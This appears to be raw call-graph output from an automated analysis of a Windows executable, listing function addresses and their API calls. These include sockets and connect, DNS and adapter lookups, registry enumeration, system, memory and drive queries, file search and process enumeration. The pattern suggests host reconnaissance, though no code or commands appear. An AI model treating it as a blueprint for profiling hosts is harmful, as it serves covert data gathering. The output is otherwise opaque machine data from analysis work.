94733->94734 94735 1c703d 94733->94735 94734->94735 94735->94737 94809 1c6d50 44 API calls 94735->94809 94737->94700 94738->94737 94739 1c71c0 79 API calls 94738->94739 94740 1c7082 94738->94740 94739->94738 94810 1c6d50 44 API calls 94740->94810 94742->94694 94743->94697 94745 1d9345 94744->94745 94746 1d88b0 2 API calls 94745->94746 94748 1d93af 94746->94748 94811 1db020 94748->94811 94749 1d9422 94749->94697 94750->94685 94751->94675 94753 1da8e6 94752->94753 94754 1da903 recvfrom 94752->94754 94753->94754 94755 1da8ed 94753->94755 94754->94755 94755->94723 94757 1d17d0 10 API calls 94756->94757 94764 1c71e6 94757->94764 94758 1c71f2 94758->94723 94759 1c731d 94791 1dbc80 94759->94791 94761 1c739d 94763 1c73c9 94761->94763 94771 1c73e3 94761->94771 94762 1c734e 94762->94758 94762->94761 94770 1c74c2 94762->94770 94768 1c6050 61 API calls 94763->94768 94764->94758 94764->94759 94766 1c72f9 _stricmp 94764->94766 94769 1c731f strcmp 94764->94769 94765 1c7417 94795 1c7b10 18 API calls 94765->94795 94766->94758 94766->94764 94768->94758 94769->94758 94769->94764 94770->94763 94774 1c74d1 94770->94774 94771->94765 94772 1c740d 94771->94772 94800 1c6d50 44 API calls 94772->94800 94773 1c7422 94776 1c7460 94773->94776 94786 1c74b0 94773->94786 94796 1cf180 memset memset 94773->94796 94799 1c6ca0 memset memset WakeAllConditionVariable QueryPerformanceFrequency QueryPerformanceCounter 94774->94799 94776->94786 94797 1d5ca0 memset 94776->94797 94780 1c7572 94803 1cf400 memset memset 94780->94803 94782 1c7498 94782->94786 94798 1cc2d0 38 API calls 94782->94798 94785 1c74a9 94785->94786 94801 1d6150 memmove memmove 94785->94801 94802 1dc320 QueryPerformanceFrequency QueryPerformanceCounter 94786->94802 94788 1c758c 94804 1d8880 WakeAllConditionVariable 94788->94804 94790->94721 94792 1dbca1 94791->94792 94793 1dbd99 memcpy 94792->94793 94794 1dbcf1 94792->94794 94793->94794 94794->94762 94795->94773 94796->94776 94797->94782 94798->94785 94799->94758 94800->94758 94801->94786 94802->94780 94803->94788 94804->94758 94806 1da88c 94805->94806 94807 1da8aa recv 94805->94807 94806->94807 94808 1da893 94806->94808 94807->94731 94808->94731 94809->94729 94810->94729 94812 1db029 94811->94812 94813 1db052 94811->94813 94814 1db04b closesocket 94812->94814 94815 1db03e 94812->94815 94813->94749 94814->94813 94815->94749 95271 449ae0 memcpy memcpy memset memset 95272 158ab0 125 API calls 95274 1456a0 102 API calls 95275 15caa0 301 API calls 95276 383680 67 API calls 95117 113cab 187 API calls 95118 1120ad 134 API calls 95120 1124d1 strstr 95121 1188d0 51 API calls 95277 11a2d0 60 API calls 95278 132ed0 87 API calls 95124 269ce0 strlen 95125 18e4d0 212 API calls 95280 111ad9 136 API calls 95126 2958e0 29 API calls 95281 11cac0 52 API calls 95282 117ac0 51 API calls 94207 6392b0 94208 4a1360 32 API calls 94207->94208 94209 6392e2 94208->94209 94210 6392ee 94209->94210 94211 498f70 8 API calls 94209->94211 94212 6392f7 94211->94212 94213 4a1360 32 API calls 94212->94213 94214 639333 94213->94214 94215 639388 94214->94215 94216 639338 94214->94216 94224 639040 94215->94224 94232 4a1420 33 API calls 94216->94232 94219 63939f 94220 63934c 94221 6393ad 94220->94221 94222 639040 4 API calls 94220->94222 94221->94219 94223 63936b free 94222->94223 94225 639051 94224->94225 94226 6390a8 _errno 94224->94226 94225->94226 94227 63905f 94225->94227 94228 63909d 94226->94228 94229 639077 memcpy 94227->94229 94233 638fb0 94227->94233 94228->94219 94229->94228 94232->94220 94234 638fbe 94233->94234 94238 638fe2 94233->94238 94235 638ffc _errno 94234->94235 94237 638fc6 realloc 94234->94237 94235->94238 94237->94238 94238->94228 94238->94229 95130 1470c0 14 API calls 95131 26f0f0 26 API calls 95283 487690 7 API calls 95132 111bcd 139 API calls 95285 1d72c0 memset memmove memcpy memmove 95286 1142f0 158 API calls 95287 11caf0 79 API calls 95288 1616f0 83 API calls 95290 2daac0 56 API calls 95291 1f2af0 141 API calls 95133 1114e0 GetModuleHandleA LoadLibraryA GetProcAddress GetProcAddress _crt_atexit 95134 1248e0 84 API calls 95292 120ae0 WSASetEvent 95293 1116e3 44 API calls 95295 461ab0 20 API calls 95296 288ed0 24 API calls 93401 117310 93402 117320 93401->93402 93403 117332 93401->93403 93402->93403 93404 117390 93402->93404 93406 117366 93403->93406 93409 117383 93403->93409 93414 1172a0 50 API calls 93404->93414 93413 1172a0 50 API calls 93406->93413 93407 1173a1 __acrt_iob_func 93415 11cb20 78 API calls 93407->93415 93411 117380 93411->93409 93412 1173c1 fflush _errno 93412->93409 93413->93411 93414->93407 93415->93412 95299 113b10 86 API calls 95139 146910 58 API calls 95140 111114 6 API calls 93719 112f17 93720 633930 5 API calls 93719->93720 93724 112f2c 93720->93724 93721 1131d3 93724->93721 93725 11315c RegEnumKeyExA 93724->93725 93726 111619 32 API calls 93724->93726 93734 111619 93724->93734 93725->93724 93727 113046 RegOpenKeyExA 93726->93727 93727->93724 93728 113089 RegQueryValueExA 93727->93728 93729 11313b RegCloseKey 93728->93729 93733 1130d6 93728->93733 93729->93724 93732 633b30 malloc 93732->93733 93733->93729 93733->93732 93737 633c00 7 API calls 93733->93737 93738 633c90 strlen 93733->93738 93739 4a1360 93734->93739 93736 111645 RegOpenKeyExA 93736->93724 93737->93733 93740 4a1379 93739->93740 93741 4a13b0 93739->93741 93746 49d1d0 _errno 93740->93746 93743 49d1d0 32 API calls 93741->93743 93745 4a13d0 93743->93745 93744 4a1398 93744->93736 93745->93736 93748 49d287 93746->93748 93752 49d3ae 93746->93752 93747 49d340 fputc 93747->93748 93748->93747 93749 49b640 fputc 93748->93749 93750 49d504 localeconv 93748->93750 93748->93752 93753 49c9c0 28 API calls 93748->93753 93754 49db9c 93748->93754 93755 49ca50 29 API calls 93748->93755 93759 49b9d0 fputc fputc fputc 93748->93759 93760 49cc90 10 API calls 93748->93760 93762 49b6a0 fputc fputc WideCharToMultiByte _errno 93748->93762 93749->93748 93761 4a78b0 IsDBCSLeadByteEx MultiByteToWideChar MultiByteToWideChar _errno 93750->93761 93752->93744 93753->93748 93763 49b9d0 fputc fputc fputc 93754->93763 93755->93748 93758 49dbb7 93758->93744 93759->93748 93760->93748 93761->93748 93762->93748 93763->93758 95141 162110 _time64 95300 26bb20 104 API calls 95143 2dbd20 57 API calls 95302 1d8710 6 API calls 95303 1ddb10 memset memmove memmove memset 95144 37e138 66 API calls 95145 117101 __acrt_iob_func _crt_atexit 95305 12e300 269 API calls 95146 114906 50 API calls 95306 113308 65 API calls 95148 1db900 12 API calls 95307 1dfb00 15 API calls 95308 11230e 209 API calls 95309 20b300 156 API calls 95310 12f330 52 API calls 95311 136f30 92 API calls 95313 286b00 40 API calls 95314 29a700 30 API calls 95316 193b30 86 API calls 95317 1aa330 79 API calls 95318 30cb00 24 API calls 95320 120b20 156 API calls 95321 136720 155 API calls 95156 147120 13 API calls 95158 114924 87 API calls 95323 275310 21 API calls 95160 1b4920 14 API calls 94871 1c4720 94872 1c4728 94871->94872 94873 1c4733 94872->94873 94874 1c4fe0 memset 94872->94874 94875 1c4745 94874->94875 94876 1c477d 94875->94876 94906 1d85e0 memset InitializeCriticalSection InitializeConditionVariable DeleteCriticalSection 94875->94906 94878 1c4765 94879 1c476c 94878->94879 94907 1d8a80 7 API calls 94878->94907 94902 1c4878 94879->94902 94947 1c30a0 27 API calls 94879->94947 94882 1c4791 94882->94879 94908 1ced80 memset 94882->94908 94883 1c4774 94885 1c47b0 94885->94879 94886 1ce730 memset 94885->94886 94887 1c47c4 94886->94887 94887->94879 94909 1ce530 memset _time64 94887->94909 94889 1c47d8 94889->94879 94910 1ced80 memset 94889->94910 94891 1c47f7 94891->94879 94911 1ce000 memset _time64 94891->94911 94893 1c480f 94893->94879 94912 1c5540 22 API calls 94893->94912 94895 1c482e 94895->94879 94913 1c7720 memset memset memset _time64 94895->94913 94897 1c484f 94897->94879 94914 1c9270 94897->94914 94899 1c4860 94931 1c4950 94899->94931 94904 1c4886 94904->94879 94949 1cf5f0 15 API calls 94904->94949 94906->94878 94907->94882 94908->94885 94909->94889 94910->94891 94911->94893 94912->94895 94913->94897 94950 1ca440 94914->94950 94918 1c92a4 94922 1c92ab 94918->94922 95030 1d86d0 EnterCriticalSection 94918->95030 94920 1c92f3 94921 1c930c 94920->94921 95031 1cbbe0 20 API calls 94920->95031 94925 1c9331 94921->94925 94929 1c93d5 94921->94929 95032 1d7c60 memset strlen memcpy 94921->95032 94922->94899 94926 1c936a 94925->94926 94927 1d78a0 2 API calls 94925->94927 94925->94929 94926->94929 94930 1c93b1 memcpy 94926->94930 94927->94926 95033 1d86f0 LeaveCriticalSection 94929->95033 94930->94929 94932 1c4966 94931->94932 94933 1c4a14 htonl 94932->94933 94940 1c49b9 94932->94940 94945 1c486a 94932->94945 95043 1cb590 7 API calls 94933->95043 94935 1c49c5 94936 1d78a0 2 API calls 94935->94936 94935->94945 94936->94945 94937 1c4a3e 94937->94945 95044 1cbbe0 20 API calls 94937->95044 94939 1c4aa0 gethostname 94941 1c4b35 strchr 94939->94941 94942 1c4ab3 WSAGetLastError 94939->94942 94940->94935 94940->94939 94940->94945 94941->94935 94944 1c4b4f 94941->94944 94942->94940 94942->94941 94944->94945 94946 1d78a0 2 API calls 94944->94946 94945->94879 94945->94902 94948 1cfa20 9 API calls 94945->94948 94946->94935 94947->94883 94948->94904 94949->94879 94951 1ca46b 94950->94951 94955 1ca4db 94951->94955 94956 1ca48b GetAdaptersAddresses 94951->94956 94953 1ca9fa 94954 1caa03 RegOpenKeyExA 94953->94954 95003 1c9297 94953->95003 94957 1caa27 RegQueryValueExA 94954->94957 94958 1cab70 RegOpenKeyExA 94954->94958 94955->95003 95034 1dcb10 GetVersionExA 94955->95034 94975 1ca53f 94956->94975 94986 1ca4a6 94956->94986 94959 1caacc RegQueryValueExA 94957->94959 94960 1caa71 94957->94960 94961 1cac34 RegOpenKeyExA 94958->94961 94962 1cab90 RegQueryValueExA 94958->94962 94967 1cab0e 94959->94967 94968 1cab66 RegCloseKey 94959->94968 94960->94959 94977 1caa85 RegQueryValueExA 94960->94977 94963 1cacf8 RegOpenKeyExA 94961->94963 94964 1cac54 RegQueryValueExA 94961->94964 94965 1cac26 RegCloseKey 94962->94965 94966 1cabd2 94962->94966 94973 1cad14 94963->94973 94974 1cad56 RegEnumKeyExA 94963->94974 94970 1cacea RegCloseKey 94964->94970 94971 1cac96 94964->94971 94965->94961 94966->94965 94985 1cabe2 RegQueryValueExA 94966->94985 94967->94968 94981 1cab1e RegQueryValueExA 94967->94981 94968->94958 94969 1ca4f3 GetAdaptersAddresses 94969->94975 94976 1ca505 94969->94976 94970->94963 94971->94970 94988 1caca6 RegQueryValueExA 94971->94988 94972 1ca87d qsort 94984 1ca520 94972->94984 95019 1ca8a0 94972->95019 94973->95003 95042 1d7cf0 memset memcpy memcmp strlen 94973->95042 94978 1cb15d RegCloseKey 94974->94978 94979 1cad9b 94974->94979 94975->94972 94975->94984 95006 1ca794 GetBestRoute2 94975->95006 95012 1ca6c7 GetBestRoute2 94975->95012 95013 1ca81e htons 94975->95013 95016 1ca746 htons 94975->95016 95018 1cb180 32 API calls 94975->95018 94976->94984 94987 1ca527 GetAdaptersAddresses 94976->94987 94980 1caab3 94977->94980 94978->94973 94978->95003 94983 1cae16 RegOpenKeyExA 94979->94983 94980->94959 94989 1cab4c 94981->94989 94990 1cab5b 94981->94990 94993 1caddf RegEnumKeyExA 94983->94993 94994 1cae34 RegQueryValueExA 94983->94994 94984->94955 95038 1cb830 26 API calls 94984->95038 94991 1cac0c 94985->94991 94992 1cac1b 94985->94992 94986->94969 94986->94984 94987->94975 94987->94984 94995 1cacd0 94988->94995 95005 1cacdf 94988->95005 95039 1cb1e0 strlen strncat strlen 94989->95039 94990->94968 95040 1cb1e0 strlen strncat strlen 94991->95040 94992->94965 94993->94983 95000 1cb155 94993->95000 95001 1caf43 RegQueryValueExA 94994->95001 95022 1cadbc 94994->95022 95041 1cb1e0 strlen strncat strlen 94995->95041 94998 1ca8f0 strcmp 94998->95019 95000->94978 95004 1cb052 RegQueryValueExA 95001->95004 95001->95022 95003->94922 95029 1c9b60 11 API calls 95003->95029 95007 1cadc7 RegCloseKey 95004->95007 95004->95022 95005->94970 95009 1cd190 36 API calls 95006->95009 95007->94993 95008 1cae91 RegQueryValueExA 95008->95022 95009->94975 95010 1d7890 strlen 95010->95019 95011 1cafa0 RegQueryValueExA 95011->95022 95015 1cd190 36 API calls 95012->95015 95013->94975 95014 1cb0af RegQueryValueExA 95014->95022 95015->94975 95016->94975 95017 1d7890 strlen 95017->95022 95018->94975 95019->94984 95019->94998 95019->95010 95020 1ca8b0 strncat 95019->95020 95021 1ca991 strlen 95019->95021 95020->95019 95021->95020 95022->95001 95022->95004 95022->95007 95022->95008 95022->95011 95022->95014 95022->95017 95023 1caf26 strncat 95022->95023 95024 1caf17 strlen 95022->95024 95025 1cb035 strncat 95022->95025 95026 1cb026 strlen 95022->95026 95027 1cadaa strncat 95022->95027 95028 1cb141 strlen 95022->95028 95023->95022 95024->95023 95025->95022 95026->95025 95027->95022 95028->95027 95029->94918 95030->94920 95031->94921 95032->94925 95033->94922 95035 1dcbbb 95034->95035 95036 1dcb6a GetVersionExA 95034->95036 95035->94953 95036->95035 95037 1dcbd2 95036->95037 95037->94953 95038->94955 95039->94990 95040->94992 95041->95005 95042->95003 95043->94937 95044->94940 95045 2ed910 95046 2ed91d 95045->95046 95051 2eca40 95045->95051 95064 2eca40 26 API calls 95046->95064 95047 2eca5b 95052 2ecaac 95047->95052 95053 2eca71 95047->95053 95049 2ed92e 95050 2eca8b malloc 95050->95052 95054 2eca98 memset 95050->95054 95051->95047 95051->95050 95060 2eca75 95051->95060 95052->95060 95061 2c7120 20 API calls 95052->95061 95053->95054 95053->95060 95056 2ecab7 95062 2c7220 20 API calls 95056->95062 95058 2ecac0 95063 2c7310 20 API calls 95058->95063 95061->95056 95062->95058 95063->95060 95064->95049 95325 1f3b20 140 API calls 95326 209360 65 API calls 95161 41d100 57 API calls 93457 148b50 93458 148b6b 93457->93458 93497 148be6 93457->93497 93459 148bf3 93458->93459 93460 148b8f 93458->93460 93458->93497 93498 14a550 93459->93498 93617 126e40 11 API calls 93460->93617 93464 148ba1 93466 148cd9 SleepEx getsockopt 93464->93466 93467 148c99 93464->93467 93485 148bb5 93464->93485 93465 148ccf 93470 148e85 93465->93470 93474 14a150 84 API calls 93465->93474 93465->93497 93468 148d22 93466->93468 93469 148d18 WSAGetLastError 93466->93469 93467->93466 93471 148cb2 93467->93471 93468->93465 93477 148d43 93468->93477 93469->93468 93478 148eae 93470->93478 93470->93497 93624 122a00 50 API calls 93470->93624 93471->93465 93619 14b180 SleepEx getsockopt WSAGetLastError 93471->93619 93472 148c35 WSAGetLastError 93604 14a150 93472->93604 93473 148c1f connect 93473->93472 93475 148dff WSASetLastError 93474->93475 93475->93470 93479 148e1b 93475->93479 93482 12d8c0 2 API calls 93477->93482 93478->93497 93625 1178b0 closesocket 93478->93625 93479->93470 93622 12d090 66 API calls 93479->93622 93486 148d4d 93482->93486 93484 148c8b 93484->93467 93489 148dc8 93484->93489 93493 148d66 93485->93493 93485->93497 93488 14a150 84 API calls 93486->93488 93488->93493 93621 14b100 68 API calls 93489->93621 93490 148e67 93623 154fd0 51 API calls 93490->93623 93493->93497 93620 1550a0 51 API calls 93493->93620 93499 12d8c0 2 API calls 93498->93499 93500 14a575 93499->93500 93502 14a597 93500->93502 93630 1175e0 93500->93630 93601 14a6d9 93502->93601 93643 14ef30 93502->93643 93503 14a709 93506 1178b0 51 API calls 93503->93506 93523 14a713 93503->93523 93505 14a63a 93509 14a641 93505->93509 93510 14a69b _errno _errno _errno 93505->93510 93506->93523 93507 148bfc 93507->93465 93507->93472 93507->93473 93507->93497 93511 14a650 setsockopt 93509->93511 93513 14a683 93509->93513 93656 12d090 66 API calls 93510->93656 93511->93513 93514 14a7e5 93511->93514 93513->93514 93660 154fd0 51 API calls 93513->93660 93518 14a802 93514->93518 93519 14a8ee 93514->93519 93515 14a6c9 93657 154f40 52 API calls 93515->93657 93521 14a811 setsockopt 93518->93521 93522 14a87c 93518->93522 93525 14a962 getsockopt 93519->93525 93526 14a92a 93519->93526 93550 14a9ac 93519->93550 93521->93522 93524 14a83b 93521->93524 93527 14ac6a 93522->93527 93531 14ac20 getsockopt 93522->93531 93532 14a8b9 93522->93532 93523->93507 93659 1550a0 51 API calls 93523->93659 93524->93522 93533 14a854 WSAGetLastError 93524->93533 93529 14a984 93525->93529 93530 14a991 setsockopt 93525->93530 93664 137620 11 API calls 93526->93664 93527->93550 93665 14b1e0 58 API calls 93527->93665 93529->93530 93529->93550 93530->93550 93535 14ac42 93531->93535 93536 14ac4f setsockopt 93531->93536 93663 137620 11 API calls 93532->93663 93661 12d090 66 API calls 93533->93661 93534 14a945 93534->93525 93539 14a94c 93534->93539 93535->93527 93535->93536 93536->93527 93539->93550 93541 14af41 93655 1767e0 ioctlsocket 93541->93655 93542 14a8d4 93542->93531 93545 14a8df 93542->93545 93543 14a86d 93662 154fd0 51 API calls 93543->93662 93545->93527 93547 14af56 93548 14af5d 93547->93548 93549 14afb9 WSAGetLastError 93547->93549 93548->93523 93553 14a150 84 API calls 93548->93553 93549->93601 93550->93541 93551 14abe1 93550->93551 93552 14ab0a strlen 93550->93552 93550->93601 93554 14aed3 htons 93551->93554 93555 14abee 93551->93555 93552->93551 93561 14ab22 93552->93561 93556 14af8f 93553->93556 93557 14aeeb bind 93554->93557 93555->93557 93558 14abf9 htons 93555->93558 93559 12d8c0 2 API calls 93556->93559 93568 14af03 93557->93568 93569 14afcf 93557->93569 93560 14ac0c 93558->93560 93559->93523 93560->93557 93562 14ae32 93561->93562 93563 14acb8 93561->93563 93565 14abb9 93561->93565 93562->93565 93673 154fd0 51 API calls 93562->93673 93563->93565 93577 14acdc WSAGetLastError 93563->93577 93563->93601 93564 14af33 93564->93541 93572 14adc5 93565->93572 93573 14ad45 93565->93573 93580 14adea WSAGetLastError 93565->93580 93667 146be0 164 API calls 93565->93667 93566 14b056 WSAGetLastError 93677 12d090 66 API calls 93566->93677 93568->93564 93675 154fd0 51 API calls 93568->93675 93569->93566 93574 14aff8 htons bind 93569->93574 93676 154fd0 51 API calls 93569->93676 93570 14b07b 93678 154f40 52 API calls 93570->93678 93581 14ae8e 93572->93581 93582 14aeb8 93572->93582 93572->93601 93575 14ade6 93573->93575 93576 14ad5f 93573->93576 93574->93568 93574->93569 93575->93580 93668 1620d0 58 API calls 93576->93668 93666 12d090 66 API calls 93577->93666 93671 12d090 66 API calls 93580->93671 93581->93557 93590 14ae93 strchr 93581->93590 93674 1745c0 12 API calls 93582->93674 93586 14b08b 93586->93601 93594 14aead 93590->93594 93591 14ad01 93672 154f40 52 API calls 93591->93672 93592 14aecc 93592->93554 93592->93557 93593 14ad7b 93595 14adb7 93593->93595 93669 154fd0 51 API calls 93593->93669 93679 1745c0 12 API calls 93594->93679 93670 163030 50 API calls 93595->93670 93600 14b0bf 93600->93560 93602 14b0ca htons 93600->93602 93601->93503 93601->93523 93658 122a00 50 API calls 93601->93658 93602->93560 93603 14b0e5 strtoul 93602->93603 93603->93560 93605 14a15f 93604->93605 93616 148c4d 93604->93616 93606 14a181 getsockname 93605->93606 93605->93616 93607 14a1f7 93606->93607 93608 14a1d0 WSAGetLastError 93606->93608 93610 14ef30 60 API calls 93607->93610 93686 12d090 66 API calls 93608->93686 93611 14a20f 93610->93611 93613 14a216 _errno _errno 93611->93613 93611->93616 93612 14a1eb 93688 154f40 52 API calls 93612->93688 93687 12d090 66 API calls 93613->93687 93616->93484 93618 1550a0 51 API calls 93616->93618 93617->93464 93618->93484 93619->93465 93620->93497 93621->93465 93622->93490 93623->93470 93624->93478 93626 1178c5 93625->93626 93627 1178dc 93625->93627 93689 1172a0 50 API calls 93626->93689 93627->93497 93629 1178d7 93629->93627 93631 117607 socket 93630->93631 93632 1175ef 93630->93632 93633 11762b 93631->93633 93634 11763f 93631->93634 93632->93631 93635 117601 93632->93635 93636 117643 93632->93636 93680 1172a0 50 API calls 93633->93680 93634->93502 93635->93631 93681 1172a0 50 API calls 93636->93681 93639 11763a 93639->93634 93640 117654 __acrt_iob_func 93682 11cb20 78 API calls 93640->93682 93642 117674 fflush _errno 93642->93502 93644 14ef47 93643->93644 93646 14efa8 93643->93646 93645 14ef81 93644->93645 93650 14ef4c 93644->93650 93684 173d10 58 API calls 93645->93684 93648 14efc0 93646->93648 93685 11c960 49 API calls 93646->93685 93648->93505 93649 14ef66 _errno 93649->93505 93650->93649 93683 173d10 58 API calls 93650->93683 93653 14ef5f 93653->93649 93654 14ef96 htons 93653->93654 93654->93648 93655->93547 93656->93515 93657->93601 93658->93503 93659->93507 93660->93514 93661->93543 93662->93522 93663->93542 93664->93534 93665->93550 93666->93591 93667->93573 93668->93593 93669->93595 93670->93572 93671->93591 93672->93601 93673->93565 93674->93592 93675->93564 93676->93569 93677->93570 93678->93586 93679->93600 93680->93639 93681->93640 93682->93642 93683->93653 93684->93653 93685->93648 93686->93612 93687->93612 93688->93616 93689->93629 95164 343170 24 API calls 95165 150550 51 API calls 95327 45ab00 62 API calls 95328 46cb00 117 API calls 95329 113357 140 API calls 95166 286960 22 API calls 95167 384d70 61 API calls 95330 29cf60 38 API calls 95168 3a0170 72 API calls 93764 11255d 93765 499f70 93764->93765 93766 11256c GetSystemInfo 93765->93766 93767 633b30 malloc 93766->93767 93768 112589 93767->93768 93769 1125a0 GlobalMemoryStatusEx 93768->93769 93770 633b30 malloc 93769->93770 93771 1125ec 93770->93771 93772 112603 GetLogicalDriveStringsA 93771->93772 93773 112626 93772->93773 93774 112762 93772->93774 93775 633930 5 API calls 93773->93775 93777 633b30 malloc 93774->93777 93776 11262b 93775->93776 93776->93774 93779 11263c GetDriveTypeA 93776->93779 93778 1127bf 93777->93778 93782 1127d6 KiUserCallbackDispatcher 93778->93782 93780 112743 strlen 93779->93780 93781 112655 GetDiskFreeSpaceExA 93779->93781 93780->93776 93781->93780 93796 11268b 93781->93796 93784 1127f8 93782->93784 93785 633b30 malloc 93784->93785 93787 112809 93785->93787 93788 633b30 malloc 93787->93788 93789 11282b 93788->93789 93790 112842 SHGetKnownFolderPath wcscpy wcscat FindFirstFileW 93789->93790 93791 112906 FindNextFileW 93790->93791 93792 112928 93790->93792 93791->93791 93791->93792 93794 633b30 malloc 93792->93794 93793 633a20 malloc 93793->93796 93795 11293d 93794->93795 93797 112954 K32EnumProcesses 93795->93797 93796->93780 93796->93793 93803 633c00 7 API calls 93796->93803 93804 633c90 strlen 93796->93804 93798 11297b 93797->93798 93800 112992 93797->93800 93799 633b30 malloc 93798->93799 93799->93800 93801 633b30 malloc 93800->93801 93802 1129e0 93801->93802 93803->93796 93805 1c8b50 93806 1c8b60 93805->93806 93808 1c8b88 93806->93808 93829 1d8e70 93806->93829 93834 1d88b0 QueryPerformanceFrequency QueryPerformanceCounter 93808->93834 93810 1c8b9a 93814 1c8c32 93810->93814 93836 1c7820 93810->93836 93812 1c8bc6 93812->93814 93845 1d4530 93812->93845 93815 1c8c2b 93815->93814 93816 1c8cb5 93815->93816 93878 1c8db0 13 API calls 93815->93878 93852 1ce7c0 93816->93852 93820 1c8d83 93820->93816 93822 1c8d8d 93820->93822 93879 1c6e90 memset memset 93822->93879 93824 1c8d1a 93860 1c6050 93824->93860 93825 1c8d40 93877 1c6e90 memset memset 93825->93877 93830 1d8ea7 93829->93830 93831 1d8e80 93829->93831 93830->93806 93880 1d8d60 9 API calls 93831->93880 93833 1d8e95 93833->93830 93835 1d88f2 93834->93835 93835->93810 93837 1c784c 93836->93837 93841 1c78f8 93836->93841 93838 1c78bc 93837->93838 93840 1c78c0 93837->93840 93837->93841 93843 1c7877 93837->93843 93883 1c7960 memset memmove memmove memcpy strlen 93838->93883 93840->93838 93882 1cf400 memset memset 93840->93882 93841->93812 93843->93838 93881 1cf400 memset memset 93843->93881 93846 1d455e 93845->93846 93847 1d4579 93845->93847 93884 1d4c20 15 API calls 93846->93884 93847->93815 93849 1d4572 93849->93847 93885 1d17d0 93849->93885 93851 1d458e 93851->93815 93853 1ce7db 93852->93853 93855 1c8cf2 93852->93855 93916 1c4fe0 93853->93916 93855->93825 93856 1ce600 93855->93856 93857 1ce60d 93856->93857 93859 1c8d13 93856->93859 93857->93859 93920 1dcd70 memset 93857->93920 93859->93824 93859->93825 93861 1c60d9 93860->93861 93921 1daa30 93861->93921 93865 1c64a4 93960 1cf400 memset memset 93865->93960 93867 1c64c7 93868 1c6506 93867->93868 93869 1c68df 93867->93869 93961 1dc320 QueryPerformanceFrequency QueryPerformanceCounter 93868->93961 93872 1c6050 61 API calls 93869->93872 93871 1c6515 93962 1cf400 memset memset 93871->93962 93873 1c68d2 93872->93873 93873->93814 93875 1c652f 93963 1d8880 WakeAllConditionVariable 93875->93963 93878->93820 93880->93833 93881->93843 93882->93840 93883->93841 93884->93849 93886 1d1801 93885->93886 93903 1d1918 93885->93903 93906 1d5cc0 memset 93886->93906 93888 1d1808 93888->93903 93907 1d2cb0 memset 93888->93907 93890 1d1911 93891 1d1990 93890->93891 93890->93903 93908 1d31b0 memset 93890->93908 93893 1d19ab 93891->93893 93891->93903 93909 1d31b0 memset 93891->93909 93897 1d19ca 93893->93897 93893->93903 93910 1d31b0 memset 93893->93910 93900 1d1a76 93897->93900 93897->93903 93911 1de3e0 memset memmove memmove memcpy 93897->93911 93912 1d2f90 6 API calls 93897->93912 93900->93903 93904 1d1a9f 93900->93904 93913 1d1b30 10 API calls 93900->93913 93903->93851 93904->93903 93905 1d1ac8 93904->93905 93914 1d1b30 10 API calls 93904->93914 93905->93903 93915 1d1b30 10 API calls 93905->93915 93906->93888 93907->93890 93908->93891 93909->93893 93910->93897 93911->93897 93912->93897 93913->93900 93914->93904 93915->93905 93917 1c4fec 93916->93917 93918 1c5003 93917->93918 93919 1c4ff3 memset 93917->93919 93918->93855 93919->93918 93920->93859 93922 1daa5f 93921->93922 93923 1c62fc 93922->93923 93964 1ce730 93922->93964 93959 1c6d50 44 API calls 93923->93959 93926 1daabf 93928 1daacd htons 93926->93928 93939 1dab0e 93926->93939 93927 1dab18 htons 93929 1dab58 93927->93929 93928->93929 93930 1dab96 socket 93929->93930 93931 1dab75 93929->93931 93930->93931 93930->93939 93932 1dabd0 ioctlsocket 93931->93932 93933 1dad2e 93931->93933 93931->93939 93934 1dabef setsockopt 93932->93934 93935 1dac10 93932->93935 93933->93939 93944 1dada0 connect 93933->93944 93948 1dadb3 WSAGetLastError 93933->93948 93950 1dade1 93933->93950 93934->93935 93934->93939 93936 1dac37 93935->93936 93937 1dac16 setsockopt 93935->93937 93940 1dac7a 93936->93940 93941 1dad04 93936->93941 93945 1dac57 htonl 93936->93945 93937->93936 93937->93939 93938 1dae6e closesocket 93938->93923 93939->93923 93939->93938 93942 1dace7 setsockopt 93940->93942 93946 1dac9d 93940->93946 93941->93933 93943 1dad0a setsockopt 93941->93943 93942->93941 93943->93933 93943->93939 93944->93948 93947 1dacc6 bind 93945->93947 93946->93947 93947->93939 93949 1dacdd 93947->93949 93948->93933 93948->93939 93949->93941 93949->93942 93950->93939 93967 1daf70 93950->93967 93953 1daeaf 93970 1ce760 memset 93953->93970 93954 1dae9f 93956 1ce7c0 memset 93954->93956 93957 1daea6 93956->93957 93957->93939 93971 1ce180 memset 93957->93971 93959->93865 93960->93867 93961->93871 93962->93875 93963->93873 93965 1c4fe0 memset 93964->93965 93966 1ce737 93965->93966 93966->93926 93966->93927 93966->93939 93968 1daf93 getsockname 93967->93968 93969 1dae21 93967->93969 93968->93969 93969->93939 93969->93953 93969->93954 93970->93957 93971->93939 95331 3d2370 65 API calls 93972 113d5e 93977 113d30 93972->93977 93973 113d90 93981 11fcb0 99 API calls 93973->93981 93976 113dc1 93977->93972 93977->93973 93978 120ab0 93977->93978 93982 1205b0 93978->93982 93981->93976 93983 1205bd 93982->93983 93987 1207c7 93982->93987 93983->93987 93988 12066a 93983->93988 93994 1207ce 93983->93994 94018 1203c0 52 API calls 93983->94018 94019 127450 83 API calls 93983->94019 93986 1207ef 94014 123000 93986->94014 93987->93977 93988->93994 93997 1206f0 93988->93997 94020 1273b0 83 API calls 93988->94020 93992 12075f getsockopt 93992->93997 93993 120802 93996 120a2f 93993->93996 93998 120861 WSAWaitForMultipleEvents 93993->93998 94022 126fa0 93993->94022 94021 127380 50 API calls 93994->94021 93995 120707 WSAEventSelect 93995->93994 93995->93997 93996->93994 94041 122f10 QueryPerformanceCounter GetTickCount 93996->94041 93997->93986 93997->93992 93997->93995 94000 1176a0 84 API calls 93997->94000 94007 120854 93998->94007 94000->93997 94003 1208c8 WSAEnumNetworkEvents 94003->94007 94004 120a19 WSAResetEvent 94004->93996 94005 120a6b 94005->93994 94006 120a87 94005->94006 94042 126df0 Sleep WSASetLastError 94006->94042 94007->94003 94009 120928 WSAEventSelect 94007->94009 94013 120970 94007->94013 94009->94007 94010 120a94 94010->93994 94011 1209e8 WSAEnumNetworkEvents 94012 1209d0 WSAEventSelect 94011->94012 94011->94013 94012->94011 94012->94013 94013->94004 94013->94011 94013->94012 94015 123018 94014->94015 94017 123031 94014->94017 94016 12d8c0 2 API calls 94015->94016 94015->94017 94016->94017 94017->93993 94018->93983 94019->93983 94020->93988 94021->93987 94023 126fd4 94022->94023 94024 126feb 94022->94024 94023->94024 94035 12701b 94023->94035 94025 120847 94024->94025 94026 127186 WSASetLastError 94024->94026 94027 126fff Sleep 94024->94027 94025->93994 94025->93998 94025->94007 94026->94025 94027->94025 